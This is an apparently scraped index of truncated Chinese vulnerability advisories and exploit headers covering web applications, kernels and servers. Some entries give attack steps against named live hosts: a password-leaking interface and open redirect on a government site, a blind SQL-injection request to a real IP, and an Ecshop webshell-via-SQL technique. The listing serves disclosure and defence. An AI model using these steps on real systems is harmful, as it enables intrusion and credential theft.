大汉版通JIS统一身份认证系统某处泄漏用户密码及一处跳转漏洞

简要描述： 可获取所有用户的用户信息（包含密码），另外附送一个跳转的漏洞。 详细说明： 获取用户密码的问题主要是产生在接口上的，这接口过于开放了……跳转就没什么可说的了。 先发跳转： http://management.ysx.gov.cn/jis/check/zx.jsp?url=http://www.baidu.com 自定义url参数即可。 漏洞证明： 接口的问题产生在jis/interface/offer.jsp http://management.ysx.gov.cn/jis/interface/offer.jsp?flag=user...

金蝶某应用存在post盲注漏洞

简要描述： 。。。。。。。 详细说明： 漏洞网站：http://211.151.164.209/ post信息 POST /search/result.html HTTP/1.1 Content-Length: 68 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://211.151.164.209:80/ Cookie: JSESSIONID=1CF29CEB6B2C4504B942265891E7A3AF Host: 211.151.164.2...

Ecshop后台getshell漏洞

简要描述： 非模板 详细说明： 爆路径+sql命令执行=getshell 0x01.爆路径，得到物理路径 http://127.0.0.1/ecshop/languages/enus/common.php 0x02.后台sql语句执行处，into outfile写文件，配合上步得到的物理路径拿shell 在sql语句处输入： select "" into outfile '物理路径//test.php'; 0x03.提交执行，接下来，mysql报错了 0x04.再去看看，可爱的shell已经在那里了 漏洞证明： https://i...

phpMyAdmin 'filename_template' 远程代码执行(CVE-2013-3239)

BUGTRAQ ID: 59465 CVECAN ID: CVE-2013-3239 phpmyadmin是MySQL数据库的在线管理工具，主要功能包括在线创建数据表、运行SQL语句、搜索查询数据以及导入导出数据等。 phpMyAdmin 3.5.x、4.x在配置了SaveDir目录后，通过导出文件文件名的双扩展名，经过身份验证的远程用户可以执行任意代码，导致Apache HTTP服务器将此文件解释为可执行文件。例如：.php.sql文件名。 0 phpMyAdmin 3.x phpMyAdmin 3.5.x 厂商补丁： phpMyAdmin ----------...

IIS 7.5 解析错误 命令执行漏洞

IIS是由微软公司提供的基于运行Microsoft Windows的互联网基本服务，其7.0、7.5版本在URI中出现xxx.jpg/xxx.php这样形式的访问时与后端FastCGI处理不一致，导致攻击者可以通过在图片中嵌入PHP代码，然后以xxx.jpg/xxx.php的形式来访问图片，IIS就会执行图片中的PHP代码，导致命令执行漏洞。 IIS 7.0、7.5...

VMware vCenter, ESXi, ESX NFC协议内存破坏漏洞

BUGTRAQ ID: 58115 CVECAN ID: CVE-2013-1659 VMware vCenter是VMware vSphere套件中一个强大的主机和虚拟机集中管理组件。VMware ESX Server是为适用于任何系统环境的企业级虚拟计算机软件。 VMware vCenter, ESXi, ESX NFC在处理NFC协议时存在安全漏洞，要利用此漏洞攻击者必须截获并修改vCenter Server与客户端或ESXi/ESX与客户端之间的NFC通讯。成功利用此漏洞可导致代码执行。 0 VMWare ESX 4.1 VMWare ESX 4.0 VMWare ESX 3.5...

Ruby on Rails Active Record组件SQL注入漏洞(CVE-2012-6496)

CVE ID:CVE-2012-6496 Ruby on Rails是一款Web应用程序框架，构建在Ruby语言之上。 Ruby on Rails Active Record组件存在一个SQL注入漏洞，允许攻击者利用"findby"方法进行SQL注入攻击，可获得敏感信息或控制应用系统。 0 Ruby on Rails 3.0.x Ruby on Rails 3.1.x Ruby on Rails 3.2.x 厂商解决方案 Ruby on Rails 3.0.18，3.1.9和3.2.10已经修复此漏洞，建议用户下载使用： http://www.ruby-lang.org...

Linux kernel 2.6.x iptables '--syn'规则安全绕过漏洞

Bugtraq ID: 53733 CVE ID：CVE-2012-2663 Linux是一款开源的操作系统。 Linux Kernel iptables在某些情况下不正确处理SYN+FIN，攻击者可以发送SYN/FIN绕过所有包含--syn的访问规则，未授权创建连接。 0 Linux kernel 2.6.x 厂商解决方案 Linux ----- 用户可参考如下供应商提供的安全公告获得补丁信息：...

Microsoft .NET Framework 缓存处理代码执行漏洞

BUGTRAQ ID: 51203 CVE ID: CVE-2011-3417 ASP.NET是一套由Microsoft分发的帮助开发者构建基于WEB应用的系统。 Microsoft .NET Framework在处理缓存内容的方式上存在权限提升漏洞，通过发送特制的链接并诱使用户打开此类链接，攻击者可利用此漏洞执行任意恶意代码。 0 Microsoft .NET Framework 4.x Microsoft .NET Framework 3.x Microsoft .NET Framework 2.x Microsoft .NET Framework 1.x 厂商补丁： Microso...

Adobe Flash Player Integer Overflow

No description provided by source. iDefense Security Advisory 08.09.11 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 09, 2011 I. BACKGROUND Adobe Flash Player is an application for viewing animations and movies using computer programs such as a Web browser; in common usage, Flash let...

Linux Kernel fs/partitions/osf.c信息泄露漏洞

BUGTRAQ ID: 46878 CVE ID: CVE-2011-1163 Linux Kernel是Linux操作系统的内核。 Linux Kernel在fs/partitions/osf.c的实现上存在信息泄露漏洞，本地攻击者可利用此漏洞从堆内存获取敏感信息。 自动验证存储设备的OSF分区表的代码中存在缓冲区溢出错误 Linux kernel 2.6.x OpenVZ Project OpenVZ 028stab091.1 厂商补丁： Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.kernel.org/...

Mozilla Firefox/Thunderbird/SeaMonkey Array.reduceRight()远程代码执行漏洞

BUGTRAQ ID: 48372 CVECAN ID: CVE-2011-2371 Firefox是一款非常流行的开源WEB浏览器。Thunderbird是一个邮件客户端，支持IMAP、POP邮件协议以及HTML邮件格式。SeaMonkey是开源的Web浏览器、邮件和新闻组客户端、IRC会话客户端和HTML编辑器。 Mozilla Firefox、Thunderbird和SeaMonkey在处理超长JavaScript数组的实现上存在远程代码执行漏洞，远程攻击者可利用这些漏洞执行任意代码，使受响应用程序崩溃，可能造成拒绝服务。 Mozilla Firefox 3.6.x Mozilla...

动网(DVbbs) Ver 8.3.0 多个跨站漏洞

动网论坛做为目前国内最大的社区论坛软件服务提供商，依靠其强大的功能、非凡的访问速度和负载能力、友好方便的客户操作界面、优质的客户服务、国内领先的 技术和强大而持续的产品研发并保持不断创新的能力，动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上。 目标网站对用户提交的变量代码未进行有效的过滤或转换，允许攻击者插入恶意WEB代码。 此版本新存在两处跨站漏洞 DVbbs Version 8.3.0 等待官方补丁 demo1:...

MacOS X 10.6 HFS File System Attack (Denial of Service)

No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 / Proof of Concept for CVE-2010-0105 MacOS X 10.6 hfs file system attack Denial of Service by Maksymilian Arciemowicz from SecurityReason.com http://securityreason.com/achievementexploitalert/15 NOTE: This DoS will b...

Apache Tomcat认证头信息泄露漏洞

BUGTRAQ ID: 39635 CVE ID: CVE-2010-1157 Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。 BASIC和DIGEST认证的WWW-Authenticate头包含有区域名。如果web.xml中对应用指定了realm- name元素，就会使用指定的区域名，否则Tomcat就会使用以下代码段生成一个区域名： request.getServerName + ":" + request.getServerPort 在某些环境中这可能会暴露运行Tomcat机器的本地主机名或IP地址。 Apache Group Tomcat 6.0.x...

Linux kernel 2.6.x KVM超大SMP指令本地拒绝服务漏洞

BUGTRAQ ID: 37130 CVE ID: CVE-2009-4031 Linux Kernel是开放源码操作系统Linux所使用的内核。 在x86平台上，x86模拟器上的arch/x86/kvm/emulate.c文件的doinsnfetch函数没有限制每次指令可获取的指令字节数。guest操作系统中的用户可以利用这个漏洞在SMP主机上造成很大的延迟，导致主机操作系统上本地拒绝服务。 Linux kernel 2.6.x 厂商补丁： Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Linux Kernel SCTP实现远程拒绝服务漏洞

CVECAN ID: CVE-2010-0008 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的流控制传输协议（SCTP）实现的sctprcvootb函数中存在空指针引用错误。远程攻击者可以通过向目标系统发送特制的 SCTP报文来触发这个漏洞，导致拒绝服务的情况。 Linux kernel 2.6.x 厂商补丁： Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

SeaMonkey 1.1.8 Remote Array Overrun

No description provided by source. From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SeaMonkey 1.1.8 Remote Array Overrun Arbitrary code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis.:...

ToutVirtual VirtualIQ Pro 3.2 Multiple Vulnerabilities

No description provided by source. &redirectSecure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote: Remote Vendor URL:...

Linux内核'pipe.c'本地特权提升漏洞

Bugraq ID: 36901 CVE ID：CVE-2009-3547 Linux是一款开放源代码的操作系统。 Linux Kernel 'pipe.c'存在一个Null指针引用问题，本地攻击者可以利用漏洞提升特权。 piperdwropen会触发Null指针异常生成如下堆栈跟踪： Unable to handle kernel NULL pointer dereference at 0000000000000028 RIP: ffffffff802899a5 piperdwropen+0x35/0x70 ffffffff8028125c dentryopen+0x13c/0x230...

Joomla Component com_lucygames (gameid) SQL Injection Vuln

No description provided by source. 000000000000000000000 00000000000000000000000000000000000 0000000000000000 00000000000000000000000000000000 + Joomla Component Comlucygames gameid Remote SQL Injection Vulnerabilities + Software : Joomla Component Comlucygales +...

Linux Kernel binfmt_flat.c空指针引用拒绝服务漏洞

BUGTRAQ ID: 36037 CVECAN ID: CVE-2009-2768 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的flat子系统中fs/binfmtflat.c文件的loadflatsharedlibrary函数存在空指针应用错误。如果本地用户执行了共享的flat二进制程序的话，就可以触发这个错误，导致系统崩溃。 Linux kernel 2.6.x 厂商补丁： Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)

No description provided by source. ? printr' IIS 6 WEBDAV Exploit.By [email protected] && Securiteweb.org Usage: php '.$argv0.' source/path/put host path Example: php '.$argv0.' source www.tian6.com /blog/readme.asp Example2: php '.$argv0.' path www.tian6.com /secret/ Example3: php '.$argv0.' put...

Coppermine Photo Gallery <= 1.4.22 Remote Exploit

No description provided by source. !/usr/bin/perl Coppermine Photo Gallery = 1.4.22 Remote Exploit Need registerglobals = on and magicquotesgpc = off Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713 Coded by girex use LWP::UserAgent; ifnot defined $ARGV0 banner; print "-...

Sendmail X-header头远程堆溢出漏洞

BUGTRAQ ID: 34944 CVECAN ID: CVE-2009-1490 Sendmail是很多大型站点都在使用的邮件传输代理（MTA）。 如果远程攻击者向Sendmail发送了包含有超长X-header头的畸形报文的话，就可能触发堆溢出，导致拒绝服务或执行任意代码。 Sendmail 8.13.2 Sendmail Consortium ------------------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.sendmail.org/releases/8.13.2 $ telnet example.com 25...

VirtueMart <= 1.1.2 Multiple Remote Vulnerabilities

No description provided by source. Author: Janek Vind "waraxe" Date: 24. January 2009 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-71.html Description of vulnerable software: VirtueMart is an Open Source E-Commerce solution to be used together with a Content Management System CMS...

Free Download Manager多个远程安全漏洞

CVECAN ID: CVE-2009-0183,CVE-2009-0184 Free Download Manager是一种强大易用而且免费的网络下载管理及加速软件。 Free Download Manager的实现上存在多个远程安全漏洞，远程攻击者可能利用此漏洞控制运行了FDM的用户系统。 Free Download Manager处理torrent文件中的文件名、注释、URL等字串时存在堆或栈缓冲区溢出，攻击者可能通过诱使用户处理恶意的torrent文件触发漏洞控制用户系统。FDM的Remote Control...

Oracle WebLogic Apache连接器远程缓冲区溢出漏洞

CVECAN ID: CVE-2008-4008 WebLogic包含多种应用系统集成方案，包括Server/Express/Integration等。 WebLogic的Apache连接器实现上存在漏洞，模块做处理请求所带的畸形参数时，未进行长度检查就把字符串拷贝到固定长度的栈缓冲区中，远程攻击者可能利用此漏洞触发栈溢出，导致执行任意指令。 Oracle WebLogic Server Oracle ------ 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Google Chrome畸形'view-source' HTTP头拒绝服务漏洞

BUGTRAQ ID: 31035 CNCAN ID：CNCAN-2008090601 Google Chrome是一款谷歌公司新开发的WEB浏览器。 Google Chrome处理特殊构建的HTTP 'view-source'头字段数据存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 构建包含如下代码的WEB页，诱使用户使用Google Chrome打开： script a = window.open'view-source:http://123' a.alert1 /script 可导致应用程序崩溃。 Google Chrome 0.2.149 27 目前没有解决方案提供...

Allaire ColdFusion 4.0x CFCACHE功能泄露信息漏洞

BUGTRAQ ID: 917 CVECAN ID: CVE-2000-0057 Allaire ColdFusion是一个用来增强Web交互功能的组件。 ColdFusion 4.x包含一个叫做CFCACHE的功能，它通过储存HTML处理CFM页的输出来提高服务器的性能。 当CFCACHE标签处理CFM页面时，它创建一些临时文件，其中一些文件是.tmp文件，其中包含了当前的HTML输出。同时它也创建一个名为cfcache.map的文件，其中包含了到.tmp文件的指针，内容有绝对路径、时间信息和其他URL信息。这些信息如果暴露出来可以造成潜在的危害。...

OpenSSL多个拒绝服务漏洞

BUGTRAQ ID: 29405 CVECAN ID: CVE-2008-0891,CVE-2008-1672 OpenSSL是一种开放源码的SSL实现，用来实现网络通信的高强度加密，现在被广泛地用于各种网络应用程序中。 OpenSSL在处理畸形的连接时存在漏洞，远程攻击者可能利用此漏洞导致服务器程序崩溃。 当用以下命令行运行OpenSSL时： openssl sserver -key pathtokey \ -cert pathtocertificate \ -www openssl ciphers 'ALL:COMPLEMENTOFALL' 如果接收到的Client...

Lighttpd SSL错误拒绝服务漏洞

BUGTRAQ ID: 28489 CVECAN ID: CVE-2008-1531 Lighttpd是一款轻型的开放源码Web Server软件包。 lighttpd没有正确地清除OpenSSL错误队列，如果远程攻击者可以触发SSL错误的话，如在下载结束前断开连接，lighttpd就可能断开所有活动的SSL连接。 LightTPD 1.4.19 厂商补丁： Debian ------ Debian已经为此发布了一个安全公告（DSA-1540-2）以及相应补丁: DSA-1540-2：New lighttpd packages fix denial of service...

Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability

No description provided by source. Mambo Component comjoovideo SQL InjectionPowered by joovideo V1.0 AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MA陌L : [email protected] TODAY MY B陌RTDAY SOO I WROTE 5 BUGS ALL FOR HACKERS 5 EXPLO陌TS HAVE 100.000 MAMBO-JOOMLA WEBPAGES ...

Mozilla Thunderbird/Seamonkey/Firefox 2.0.0.12修复多个安全漏洞

BUGTRAQ ID: 27683 CVECAN ID: CVE-2008-0412,CVE-2008-0413,CVE-2008-0414,CVE-2008-0415,CVE-2008-0417,CVE-2008-0419,CVE-2008-0591,CVE-2008-0592,CVE-2008-0593,CVE-2008-0594 Firefox/Thunderbird/SeaMonkey是Mozilla所发布的WEB浏览器和邮件/新闻组客户端。...

Web Wiz Rich Text Editor 4.0 Multiple Remote Vulnerabilities

No description provided by source. WwW.BugReport.ir AmnPardaz Security Research Team Title: Web Wiz Rich Text EditorTM Vendor: http://www.webwizguide.com/ Bug: Directory traversal + HTM/HTML file creation on the server Vulnerable Version: 4.0 Exploit: Available Fix Available: No! Fast Solution is...

PHP error_log()安全模式限制绕过漏洞

BUGTRAQ ID: 18645 CVECAN ID: CVE-2006-3011 PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。 PHP的errorlog函数中存在安全模式限制绕过漏洞： PHP5: - -2013-2050--- PHPAPI int phperrorlogint opterr, char message, char opt, char headers TSRMLSDC phpstream stream = NULL; switch opterr case 1: /send an email / if HAVESENDMAIL if...

Linux Kernel ISDN_Net.C本地缓冲区溢出漏洞

BUGTRAQ ID: 26605 CVE ID:CVE-2007-6063 CNCVE ID:CNCVE-20076063 Linux是一款开放源代码的操作系统。 Linux包含的'isdnnetsetcfg'函数存在设计错误，本地攻击者可以利用漏洞进行缓冲区溢出攻击，可能提升特权。 在isdnioctl函数中会调用isdnnetsetcfg： isdnioctl drivers/isdn/i4l/isdncommon.c: 1270 isdnioctlstruct inode inode, struct file file, uint cmd, ulong arg...

多个Web浏览器SSL证书SubjectAltName验证漏洞

多个WEB浏览器在处理SSL证书验证方面存在缺陷。问题是由于不正确处理针对X.509证书的subjectAltName扩展。 成功利用此漏洞当非法证书使用在SSL HTTP连接时，可绕过安全警告进行钓鱼攻击。 下面的WEB浏览器受此漏洞影响： - Mozilla Firefox, 和Gecko渲染引擎的WEB浏览器。 Opera - Konqueror, 和基于KHTML渲染引擎的浏览器如Apple's Safari. Opera Software Opera Web Browser 9.24 Opera Software Opera Web Browser 9.23 Mozilla...

GNUBoard上传漏洞

GNUBoard是在韩国的一个应用广泛的BBS系统，由于一些程序对输入缺少过滤，可以导致任意文件上传，甚至以WEB权限执行系统命令，WEB权限默认情况下是nobody。 GNUBoard 暂无 $source = array "/.php/", "/.htm/", "/.cgi/", "/.pl/"; $target = array ".phpx", ".htmx", ".cgix", &q...

Mercury Mail Transport System AUTH CRAM-MD5远程栈溢出漏洞

BUGTRAQ ID: 25357 Mercury Mail Transport System是一款综合的Internet邮件服务器系统。 Mercury Mail Transport System的SMTP服务器没有正确地处理超长的AUTH CRAM-MD5字符串，远程攻击者可能利用此漏洞控制服务器。 如果用户向服务器提交了恶意的认证请求的话，就可能触发栈溢出，导致完全入侵服务器系统。 Pegasus Mail Mercury Mail Transport System 4.51 Pegasus Mail Mercury Mail Transport System 4.01b...

Freetype TT_Load_Simple_Glyph() TTF文件处理整数溢出漏洞

FreeType是一个流行的字体函数库。 Freetype的truetype/ttgload.c文件中TTLoadSimpleGlyph函数处理畸形TTF图形时存在有符/无符转换错误，如果用户受骗打开了设置有负数npoints值的畸形TTF图形的话，就可能触发整数溢出和堆溢出，导致执行任意指令。 FreeType FreeType = 2.3.4 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

SunLight CMS Root参数多个远程文件包含漏洞

SunLight CMS是一款基于PHP的WEB应用程序。 SunLight CMS不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'root'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 SunLight CMS 5.3 目前没有解决方案提供： http://sunlight.profitux.cz/ http://www.example.com/path/modules/startup.php?root=Sh3LL Script...

Xoops Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit

No description provided by source. html head titleXOOPS Module Lykos Reviews 1.00 index.php BLIND SQL Injection Exploit/title script type="text/javascript" //'=============================================================================================== //'Script Name: XOOPS Module Lykos Reviews...

Web Content System 2.7.1 Remote File Inclusion Exploit

No description provided by source. Web Content System //'=============================================================================================== //'Script Name : Web Content System //' //'? //'.... //'.. //'ERROR------------------------------...

PHP <= 4.4.4 / 5.2.1 / 5.1.6 readfile() Safe Mode Bypass Vulnerability

No description provided by source. SecurityRisk : DEN Remote Exploit : No Local Exploit : Yes Exploit Given : Yes Credit : The-WolF-kSA Date : 24.3.2007 Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4 readfile Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4 Author: ThE-WoLf-KsA Date: - -Written: 24.3.2007...

Active Auction Pro 7.1 (default.asp catid) SQL Injection Vulnerability

No description provided by source. Title : Active Auction Remote SQL Injection Vulnerability Author : CyberGhost Demo Page : http://www.activewebsoftwares.com/demoactiveauction Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=1 Vuln. Username :...

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

No description provided by source. !/usr/bin/python MS Windows DCE-RPC svcctl ChangeServiceConfig2A 0day Memory Corruption PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Windows 2000 SP4 Polish all patches Requires.. - Impacket : http://oss.coresecurity.com/projects/impacket.html...

Asterisk存在多个安全漏洞

Asterisk是一款开放源代码的PBX系统。 Asterisk MGCP实现存在远程堆栈缓冲区溢出，远程攻击者可以利用漏洞以进程权限执行任意指令。 攻击者可以通过使用畸形AUEP audit endpoint应答消息来触发。 另一个问题是存在于处理发送给Record函数的文件名，通过格式串攻击可导致任意代码执行，或者通过目录遍历攻击可导致任意文件覆盖。不过这个漏洞需要管理员使用客户端控制的变量作为文件名的一部分。 Asterisk Asterisk 1.2.10 Asterisk Asterisk 1.2.9 Asterisk Asterisk 1.2.8 Asterisk...

Fantastic Scripts Fantastic News远程文件包含漏洞

Fantastic News是一款基于PHP的新闻管理程序。 Fantastic News不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'news.php'脚本对用户提交的'CONFIGscriptpath'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Fantastic Scripts Fantastic News 2.1.3 http://fscripts.com/free.php?id=1 http://www.example.com/Script...

Mambo Peoplebook Component 1.0 Remote File Include Vulnerability

No description provided by source. --------------------------------------------------------------------------- Peoplebook Mambo Component = v1.0 Remote File Include Vulnerabilities --------------------------------------------------------------------------- Author : Matdhule Date : August, 14th 20...